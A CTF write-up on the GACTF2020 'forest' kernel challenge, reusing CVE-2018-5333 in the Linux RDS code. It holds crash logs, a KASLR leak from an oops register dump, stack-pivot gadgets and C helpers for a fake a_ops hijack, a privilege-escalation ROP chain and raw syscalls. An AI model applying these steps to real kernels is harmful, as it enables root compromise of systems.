Don't Share Your Code
the code above has nothing to do with programing, the password instead

Adopting CVE knowledge to exploit CTF kernel challenges

In this post, I will introduce a kernel CTF challenge, the first one I actually solved in a real contest with my teammate. Moreover, the experience I accumulated while reproducing old CVEs was a great help in solving this challenge and helped us get first blood.

In fact, only our team solved this challenge. The reason may be a mistake by the contest organizers.

A view of the challenge

This challenge, forest, comes from GACTF2020 and was released to players late on the first night. After decompressing the attachment, you will see the files below.

$ unzip
  inflating: forest.diff
  inflating: bzImage
  inflating: rootfs.img

Launching the kernel with the provided script gives the following result. We also learnt that protections like SMEP and KASLR are enabled.

$ cat

qemu-system-x86_64 \
    -m 64 \
	-cpu qemu64,+smep,-smap \
	-kernel bzImage \
	-initrd rootfs.img \
	-nographic \
    -no-reboot \
	-append "root=/dev/sda rw console=ttyS0 quiet kaslr" \
	-monitor /dev/null \
    -smp 2 \
    -sandbox on #,obsolete=deny,elevateprivileges=deny,spawn=deny,resourcecontrol=deny
$ ./
qemu-system-x86_64: warning: TCG doesn't support requested feature: CPUID.01H:ECX.vmx [bit 5]
qemu-system-x86_64: warning: TCG doesn't support requested feature: CPUID.01H:ECX.vmx [bit 5]
Boot took 2.41 seconds
/ $ uname -a
Linux (none) 5.6.9+ #18 SMP Mon Jun 15 00:34:52 CST 2020 x86_64 GNU/Linux

As you may have noticed, one file is named forest.diff. Okay, it seems this challenge not only installs a vulnerable module but also patches the kernel to introduce a vulnerability.

$ cat forest.diff
diff --git  net/rds/rdma.c

@@ void rds_atomic_free_op(struct rm_atomic_op *ao)
	struct page *page = sg_page(ao->op_sg);

	/* Mark page dirty if it was possibly modified, which
	 * is the case for a RDMA_READ which copies from remote
	 * to local memory */
	unpin_user_pages_dirty_lock(&page, 1, true);

	ao->op_notifier = NULL;
-	ao->op_active = 0;

This weird function, rds_atomic_free_op, is patched: the line ao->op_active = 0 is deleted. Well, we can imagine that this patch may lead to a use-after-free vulnerability. The function is presumably used to free some objects, and when ao->op_active is not cleared, other operations may still be allowed to use the released object.

Cool, we have some clues in hand now, so what’s the next step? Reading the kernel source code (version 5.6.9) to find primitives? The sad thing is that the Linux network stack is too complex and unfriendly for a newbie.

A funny shot

At first glance, ao->op_active reminded me of CVE-2018-5333, an old CVE I had studied and reproduced before. Hence, I already had POC code that triggers the crash. Why not give it a shot?

Amazingly, the kernel prints crash information when dereferencing the poisoned address 0x4444444444444444.

[    5.341489] general protection fault, probably for non-canonical address 0x4444444444444444: 0000 [#1] SMP NOPTI
[    5.341735] CPU: 1 PID: 122 Comm: poc Tainted: G           O      5.6.9+ #18
[    5.341735] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[    5.341735] RIP: 0010:set_page_dirty+0x21/0xa0
[    5.341735] Code: 2e 0f 1f 84 00 00 00 00 00 53 48 89 fb e8 97 3a 01 00 48 8b 53 08 48 8d 4a ff 83 e2 01 48 0f 45 d9 48 85 c0 74 4d 48 8b 4b 08 <48> 8b 40 70 48 8d 51 ff 83 e1 01 48 8b 40 18 48 0f 44 d3 48 8b 12
[    5.341735] RSP: 0018:ffffba8c801f3b10 EFLAGS: 00000206
[    5.341735] RAX: 4444444444444444 RBX: 0000000000000000 RCX: 4444444444444444
[    5.341735] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000
[    5.341735] RBP: ffffba8c801f3b58 R08: ffff9b434351f740 R09: 00000007ffd4d61b
[    5.341735] R10: ffff9b43439541f8 R11: 0000000000000001 R12: ffffba8c801f3b60
[    5.341735] R13: 0000000000000000 R14: ffff9b43439540e8 R15: 0000000000000246
[    5.341735] FS:  00000000026b4880(0000) GS:ffff9b4343900000(0000) knlGS:0000000000000000
[    5.341735] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    5.341735] CR2: 0000000000000000 CR3: 000000000394e000 CR4: 00000000001006e0
[    5.341735] Call Trace:
[    5.341735]  set_page_dirty_lock+0x29/0x50
[    5.341735]  unpin_user_pages_dirty_lock+0x6f/0xb0
[    5.341735]  rds_atomic_free_op+0x39/0x70
[    5.341735]  rds_message_put+0x2e2/0x370
[    5.341735]  rds_sendmsg+0x290/0x1130
[    5.341735]  ? check_preempt_wakeup+0x10d/0x190
[    5.341735]  ? sock_sendmsg+0x56/0x60
[    5.341735]  sock_sendmsg+0x56/0x60
[    5.341735]  ____sys_sendmsg+0x1fb/0x280
[    5.341735]  ___sys_sendmsg+0x83/0xd0
[    5.341735]  ? _raw_spin_unlock_irqrestore+0x5/0x10
[    5.341735]  ? __wake_up_common_lock+0x82/0xb0
[    5.341735]  ? __sys_sendmsg+0x59/0xa0
[    5.341735]  __sys_sendmsg+0x59/0xa0
[    5.341735]  do_syscall_64+0x43/0x160
[    5.341735]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[    5.341735] RIP: 0033:0x44a389
[    5.341735] Code: 00 b8 00 01 00 00 eb e1 e8 54 1a 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 c0 ff ff ff f7 d8 64 89 01 48
[    5.341735] RSP: 002b:00007ffd8d933fb8 EFLAGS: 00000202 ORIG_RAX: 000000000000002e
[    5.341735] RAX: ffffffffffffffda RBX: 0000000000400400 RCX: 000000000044a389
[    5.341735] RDX: 0000000000000000 RSI: 00007ffd8d933fd0 RDI: 0000000000000003
[    5.341735] RBP: 00007ffd8d935040 R08: 0000000000000000 R09: 0000000300000000
[    5.341735] R10: 00000000026b4880 R11: 0000000000000202 R12: 0000000000401bd0
[    5.341735] R13: 0000000000000000 R14: 00000000006ba018 R15: 0000000000000000
[    5.341735] Modules linked in: forest(O)
[    5.354346] ---[ end trace ef5e047d4433cb92 ]---
[    5.354576] RIP: 0010:set_page_dirty+0x21/0xa0

Well, does this mean that the original exploit idea can be ported to this one?

In fact, the root cause of this CVE is that the failure path of rds_cmsg_atomic() forgets to clear atomic.op_active after unpinning the user page and freeing the op_notifier object. Therefore, when execution later reaches the check below, the stale flag sends the control flow down the wrong path.

/*
 * This relies on dma_map_sg() not touching sg[].page during merging.
 */
static void rds_message_purge(struct rds_message *rm)
{
	unsigned long i;
	/* ... */
	if (rm->atomic.op_active)
		rds_atomic_free_op(&rm->atomic);
	/* ... */
}
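To make the role of the stale flag concrete, here is a toy userspace model of the pattern, not kernel code. All names (toy_atomic_op, toy_setup_fail, toy_purge, toy_run) are made up for illustration; the only point is that a later cleanup pass that trusts op_active will run the release path on an operation that was already torn down.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Toy stand-in for the atomic op inside a message; NOT the kernel struct. */
struct toy_atomic_op {
    bool op_active;      /* "this op still owns resources" flag */
    int  stale_releases; /* release attempts made after teardown */
    bool torn_down;      /* set once the error path has cleaned up */
};

/* Models the release path. In the kernel there is no such bookkeeping:
 * running it on a dead op is what produces the crash. */
static void toy_free_op(struct toy_atomic_op *ao)
{
    assert(ao != NULL);
    if (ao->torn_down)
        ao->stale_releases++;
    ao->torn_down = true;
}

/* Models a setup function whose error path cleans up. With
 * clear_flag == false it behaves like the vulnerable code:
 * resources are gone but op_active stays set. */
static void toy_setup_fail(struct toy_atomic_op *ao, bool clear_flag)
{
    ao->op_active = true;       /* flag is raised early */
    toy_free_op(ao);            /* error path tears the op down */
    if (clear_flag)
        ao->op_active = false;  /* the fix: also drop the flag */
}

/* Models the later purge of the message: it only looks at op_active. */
static void toy_purge(struct toy_atomic_op *ao)
{
    if (ao->op_active)
        toy_free_op(ao);
}

/* Returns how many times the release path ran on an already dead op. */
static int toy_run(bool clear_flag)
{
    struct toy_atomic_op ao = { false, 0, false };
    toy_setup_fail(&ao, clear_flag);
    toy_purge(&ao);
    return ao.stale_releases;
}
```

Calling toy_run(true) models the fixed code and toy_run(false) models the vulnerable one; only the latter reaches the release path a second time.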

In the challenge, by contrast, it is the function rds_atomic_free_op that forgets to clear rm->atomic.op_active. So there should be a critical difference between the CVE and this challenge. Why, then, does the old POC trigger the crash here?

During the contest, we didn’t dig deeper to find the reason. We just followed the crash to write a working exploit. After the whole game was over, I started to reverse the kernel image to find out why.

The sad and unexpected thing is that I found this kernel image does not match the description in the forest.diff file.


As you can see, code that is free of CVE-2018-5333 should look like this:

	if (page)
		/* ... unpin the page ... */;
	rm->atomic.op_active = 0;   // The most important patch

	return ret;

However, the result given by IDA shows that this patch was reverted by the challenge maker. CVE-2018-5333 was re-introduced into the kernel without any notice.

Moreover, by reversing the rds_atomic_free_op function you will find that forest.diff was never applied. This is quite misleading, and I bet other teams failed to solve this challenge because of this huge mistake: maybe the wrong kernel was used or the wrong diff file was released.

No matter what, during the competition the players' goal is to obtain the flag rather than to battle with the organizers. With the crash in hand, we started to build the exploit code.

Build exploit

Though I had already reproduced this CVE, the exploit I wrote back then cannot be used to get the flag, because KASLR and SMEP are enabled. That is, we have to leak a kernel address first and then use kernel ROP.

Don’t forget there is also a vulnerable kernel module that we can use. I guess its purpose is to help us leak some addresses. However, due to the mistakes the organizers made, we can get the information directly from the crashes (probably an unintended leak).

After that, we can compute the correct offsets to reach these two important functions. Just like in the old exploit, we will hijack the code pointer mapping->a_ops->set_page_dirty to take over the control flow. You can refer to my old post.

The remaining problem is how to bypass the protections. The expected steps are:
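As a rough illustration of that pointer hijack, the sketch below lays out a fake mapping and a fake ops table in ordinary user buffers. The two offsets are read off the "Code:" bytes of the crash above (mov rax, [rax+0x70] followed by mov rax, [rax+0x18]) and are assumed to hold only for this particular build. The helper names are hypothetical, and how the fake mapping pointer is fed to the kernel is left out.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumption: offsets taken from the crash disassembly of this build. */
#define MAPPING_A_OPS_OFF   0x70  /* mapping->a_ops          */
#define A_OPS_SET_DIRTY_OFF 0x18  /* a_ops->set_page_dirty   */

/* Hypothetical helper: fill two caller-supplied buffers so that
 * following mapping->a_ops->set_page_dirty yields `target`. */
static void build_fake_mapping(uint8_t *fake_mapping, size_t mapping_len,
                               uint8_t *fake_a_ops, size_t a_ops_len,
                               uint64_t target)
{
    uint64_t a_ops_addr = (uint64_t)(uintptr_t)fake_a_ops;

    assert(mapping_len >= MAPPING_A_OPS_OFF + sizeof(uint64_t));
    assert(a_ops_len >= A_OPS_SET_DIRTY_OFF + sizeof(uint64_t));

    memset(fake_mapping, 0, mapping_len);
    memset(fake_a_ops, 0, a_ops_len);
    memcpy(fake_mapping + MAPPING_A_OPS_OFF, &a_ops_addr, sizeof(a_ops_addr));
    memcpy(fake_a_ops + A_OPS_SET_DIRTY_OFF, &target, sizeof(target));
}

/* Follow the same two loads the kernel performs, for self-checking. */
static uint64_t resolve_set_page_dirty(const uint8_t *fake_mapping)
{
    uint64_t a_ops_addr, fn;

    memcpy(&a_ops_addr, fake_mapping + MAPPING_A_OPS_OFF, sizeof(a_ops_addr));
    memcpy(&fn, (const uint8_t *)(uintptr_t)a_ops_addr + A_OPS_SET_DIRTY_OFF,
           sizeof(fn));
    return fn;
}
```

Because the launch script passes -smap, the kernel can read such user-space buffers directly, which is why the layout can live in plain user memory.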

  1. Operate on the kernel module (forest.ko) to leak the kernel base address.
  2. Construct a ROP chain to escalate privileges.
  3. Launch a shell.
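The write-up does not list the chain itself. One common shape for step 2, assumed here rather than taken from our exploit, is commit_creds(prepare_kernel_cred(0)) followed by swapgs and iretq back to userspace (the crash log says NOPTI, so no page-table switch is modelled). Every address in the struct below is a placeholder to be filled in after the leak, and the gadget set is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Placeholders only: none of these addresses comes from the write-up. */
struct rop_addrs {
    uint64_t pop_rdi_ret;         /* pop rdi ; ret                    */
    uint64_t mov_rdi_rax_ret;     /* mov rdi, rax ; ret (hypothetical) */
    uint64_t prepare_kernel_cred;
    uint64_t commit_creds;
    uint64_t swapgs_ret;          /* swapgs ; ret                     */
    uint64_t iretq;               /* iretq                            */
};

/* Userspace context that iretq restores, in the order it pops it. */
struct user_frame {
    uint64_t rip, cs, rflags, rsp, ss;
};

/* Writes the chain into `chain` and returns the number of 8-byte words. */
static size_t build_rop_chain(uint64_t *chain, size_t max_words,
                              const struct rop_addrs *a,
                              const struct user_frame *u)
{
    size_t n = 0;

    assert(max_words >= 12);
    chain[n++] = a->pop_rdi_ret;          /* rdi = 0                      */
    chain[n++] = 0;
    chain[n++] = a->prepare_kernel_cred;  /* rax = prepare_kernel_cred(0) */
    chain[n++] = a->mov_rdi_rax_ret;      /* rdi = rax                    */
    chain[n++] = a->commit_creds;         /* commit_creds(rdi)            */
    chain[n++] = a->swapgs_ret;           /* restore user gs base         */
    chain[n++] = a->iretq;                /* return to userspace          */
    chain[n++] = u->rip;                  /* e.g. a function spawning sh  */
    chain[n++] = u->cs;
    chain[n++] = u->rflags;
    chain[n++] = u->rsp;
    chain[n++] = u->ss;
    return n;
}
```

The chain is written to the memory the stack pivot lands in, and user_frame.rip would point at whatever userspace routine launches the shell for step 3.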

According to the official writeup, the kernel module is supplied to help defeat KASLR. As the author said, the original CVE vulnerability does not help in bypassing KASLR.

Spoiler Alert

The fact is that a NULL pointer dereference alone of course cannot bypass KASLR. However, if we map a buffer to prevent that crash and hijack mapping->a_ops->set_page_dirty to an arbitrary invalid pointer, the resulting crash gives us a present.

.text:FFFFFFFF81170FE3 loc_FFFFFFFF81170FE3:                   ; CODE XREF: set_page_dirty+3D↑j
.text:FFFFFFFF81170FE3                 test    rax, rax
.text:FFFFFFFF81170FE6                 mov     rdx, offset __set_page_dirty_buffers
.text:FFFFFFFF81170FED                 mov     rdi, rbx
.text:FFFFFFFF81170FF0                 pop     rbx
.text:FFFFFFFF81170FF1                 cmovz   rax, rdx
.text:FFFFFFFF81170FF5                 jmp     __x86_indirect_thunk_rax

As you can see, set_page_dirty loads the function pointer __set_page_dirty_buffers into rdx. When the indirect jump triggers the crash, we can leak that kernel address from rdx in the register dump, as shown below.

[    6.947347] RIP: 0010:0xdeadbeaf
[    6.947347] Code: Bad RIP value.
[    6.947347] RSP: 0018:ffffc90000257b18 EFLAGS: 00000206
[    6.947347] RAX: 00000000deadbeaf RBX: 0000000000000000 RCX: 0000000000000000
[    6.947347] RDX: ffffffff81216d80 RSI: 0000000000000001 RDI: 0000000000000000
[    6.947347] RBP: ffffc90000257b58 R08: ffff888003aad540 R09: 00000007fff5704e
[    6.947347] R10: ffff888003b685f8 R11: 0000000000000001 R12: ffffc90000257b60
[    6.947347] R13: 0000000000000000 R14: ffff888003b684e8 R15: 0000000000000246
[    6.947347] FS:  0000000001da2880(0000) GS:ffff888003500000(0000) knlGS:0000000000000000
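Turning such a register dump into a KASLR slide is simple arithmetic. The sketch below assumes the exploit already has the oops text in hand (how it gets it is not covered here) and that the address of __set_page_dirty_buffers in the unslid image is known from the kernel binary. The helper names and the static address used in any call are assumptions.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Extract the hex value following "RDX: " in one oops line.
 * Returns 0 when the line has no RDX field. */
static uint64_t parse_rdx(const char *line)
{
    const char *p;

    assert(line != NULL);
    p = strstr(line, "RDX: ");
    if (p == NULL)
        return 0;
    return (uint64_t)strtoull(p + strlen("RDX: "), NULL, 16);
}

/* slide = runtime address minus the address of the same symbol
 * in the unslid kernel image. */
static uint64_t kaslr_slide(uint64_t leaked, uint64_t static_addr)
{
    return leaked - static_addr;
}

/* Apply the slide to any other static address (function or gadget). */
static uint64_t rebase(uint64_t static_addr, uint64_t slide)
{
    return static_addr + slide;
}
```

With the slide known, every function and gadget address taken from the static image can be passed through rebase before it goes into the ROP chain.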

The remaining work is straightforward. However, a few interesting things are worth mentioning.

stack pivoting

There are two very useful gadgets to hijack the stack pointer into user-controlled memory.

# 1
xchg eax, esp ; ret
# 2
mov esp, 0x5b000000; pop rbp; ret;

Both gadgets modify esp. The point is that writing the lower 32 bits of rsp (that is, esp) clears the upper 32 bits to zero, so rsp ends up pointing at a low address that userspace can map.
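A minimal sketch of preparing the landing zone for such a pivot follows. It assumes an x86-64 Linux process; the function names and the number of pages mapped around the target are arbitrary choices. For the first gadget, the value in eax is the low half of whatever pointer the hijacked call jumped through; for the second, the target is simply 0x5b000000.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/mman.h>

#define PAGE_SZ 0x1000ULL

/* Where rsp lands after a 32-bit write to esp: the upper half is zero. */
static uint64_t pivot_target(uint64_t value_in_rax)
{
    return value_in_rax & 0xffffffffULL;
}

/* Map writable pages around the pivot target so both the chain above it
 * and any pushes below it have backing memory.
 * Returns the base of the mapping, or MAP_FAILED. */
static void *map_pivot_region(uint64_t target, size_t pages_below,
                              size_t pages_above)
{
    uint64_t page = target & ~(PAGE_SZ - 1);
    uint64_t base;
    size_t len;

    assert(pages_below * PAGE_SZ <= page);  /* no underflow below zero */
    base = page - pages_below * PAGE_SZ;
    len = (pages_below + pages_above + 1) * PAGE_SZ;

    return mmap((void *)(uintptr_t)base, len, PROT_READ | PROT_WRITE,
                MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
}
```

The ROP chain is then copied to the exact target address inside the mapped region before the vulnerable path is triggered.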

syscall wrapper

Be careful: when you write your own assembly to execute a syscall, you cannot follow the usual userspace function calling convention. The syscall instruction overwrites rcx, so the fourth argument goes in r10 instead of rcx, as the wrapper below shows. I wasted a lot of time here.

    movq %rdi, %rax                /* Syscall number -> rax.  */
    movq %rsi, %rdi                /* shift arg1 - arg5.  */
    movq %rdx, %rsi
    movq %rcx, %rdx
    movq %r8, %r10
    movq %r9, %r8
    movq 8(%rsp),%r9               /* arg6 is on the stack.  */
    syscall                        /* Do the system call.  */
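The same convention can be written as GCC/Clang inline assembly. This is a minimal sketch for x86-64 Linux only; raw_syscall6 is a made-up name. The number goes in rax, the arguments in rdi, rsi, rdx, r10, r8 and r9, and rcx and r11 are declared as clobbered because the syscall instruction overwrites them.

```c
#include <assert.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Raw x86-64 Linux system call with up to six arguments.
 * Note that the fourth argument is bound to r10, not rcx. */
static long raw_syscall6(long nr, long a1, long a2, long a3,
                         long a4, long a5, long a6)
{
    long ret;
    register long r10 __asm__("r10") = a4;
    register long r8  __asm__("r8")  = a5;
    register long r9  __asm__("r9")  = a6;

    assert(nr >= 0);  /* syscall numbers are non-negative */

    __asm__ volatile("syscall"
                     : "=a"(ret)
                     : "a"(nr), "D"(a1), "S"(a2), "d"(a3),
                       "r"(r10), "r"(r8), "r"(r9)
                     : "rcx", "r11", "memory");
    return ret;  /* negative values are -errno */
}
```

For example, raw_syscall6(SYS_getpid, 0, 0, 0, 0, 0, 0) returns the same value as getpid(), and a four-argument call such as rt_sigprocmask only succeeds when its size argument really arrives in r10.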


This post aims to share the buggy experience my teammates and I ran into. In other words, reproducing CVEs actually does help in CTFs, doesn’t it? :)